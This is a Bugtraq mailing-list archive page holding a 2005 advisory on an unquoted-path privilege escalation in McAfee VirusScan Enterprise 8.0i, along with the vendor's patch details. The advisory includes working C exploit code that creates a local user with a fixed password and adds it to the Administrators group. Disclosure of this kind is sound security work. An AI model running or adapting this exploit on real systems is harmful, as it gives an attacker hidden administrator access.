Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and

from [Reed Arvin] Network Security [Permanent Link]
Subject: Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)
Date: Thu, 22 Dec 2005 10:16:09 -0700 
( Original article: http://reedarvin.thearvins.com/20051222-01.html )

Summary:
Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11)
and CMA  3.5 (patch 5) (http://www.mcafee.com/)

Details:
By default the naPrdMgr.exe process runs under the context of the
Local System account. Every so often it will run through a process
where it does the following:

- Attempts to run \Program Files\Network Associates\VirusScan\EntVUtil.EXE
- Reads C:\Program Files\Common Files\Network Associates\Engine\SCAN.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\NAMES.DAT
- Reads C:\Program Files\Common Files\Network Associates\Engine\CLEAN.DAT

The issue occurs when the naPrdMgr.exe process attempts to run the
C:\Program Files\Network Associates\VirusScan\EntVUtil.EXE file.
Because of a lack of quotes the  naPrdMgr.exe process first tries to
run C:\Program.exe. If that is not found it tries to run C:\Program
Files\Network.exe. When that is not found it finally runs the
EntVUtil.EXE file that it was originally intending to run. A malicious
user can create an application named  Program.exe and place it on the
root of the C:\ and it will be run with Local System privileges by the
naPrdMgr.exe process. Source code for an example Program.exe is listed
below.

Vulnerable Versions:
McAfee VirusScan Enterprise  8.0i (patch 11) and CMA 3.5 (patch 5)

Patches/Workarounds:
The vendor has released knowledge base article kb45256 to address the issue.

Solution one from the vendor:
"This issue is resolved in Patch 12."

Solution two from the vendor:
"The VirusScan Enterprise plugin VSPLUGIN.DLL has been updated to
resolve the potential exploit. The new plugin is available as a HotFix
from McAfee Tier III Technical Support."

Exploits:

// ===== Start Program.c ======
#include <windows.h>
#include <stdio.h>

INT main( VOID )
{
    CHAR  szWinDir[ _MAX_PATH ];
    CHAR szCmdLine[ _MAX_PATH ];

     GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH );

    printf( "Creating user \"Program\" with password \"Pr0gr@m$$\"...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe user Program 
Pr0gr@m$$ /add", szWinDir );

    system( szCmdLine );

    printf( "Adding user \"Program\" to the local Administrators group...\n" );

    wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup
Administrators Program /add", szWinDir );

    system( szCmdLine );

    return 0;
}
// ===== End Program.c ======

Discovered by Reed Arvin reedarvin[at]gmail[dot]com
(http://reedarvin.thearvins.com/ )
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: [Full-disclosure] Privilege escalation in McAfee VirusScanEnterprise 8.0i (patch 11) and CMA 3.5 (patch 5), Steven Rakick
Next by Date:  [Full-disclosure] Webwasher CSM Appliance Script Security Restriction Bypass, d0t v0rt3x
Previous by Thread:  [Full-disclosure] Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5), Reed Arvin
Next by Thread:  MDKSA-2005:235 - Updated kernel packages fix numerous vulnerabilities, Mandriva Security Team
Indexes:  [Date] [Thread] [Top] [All Lists]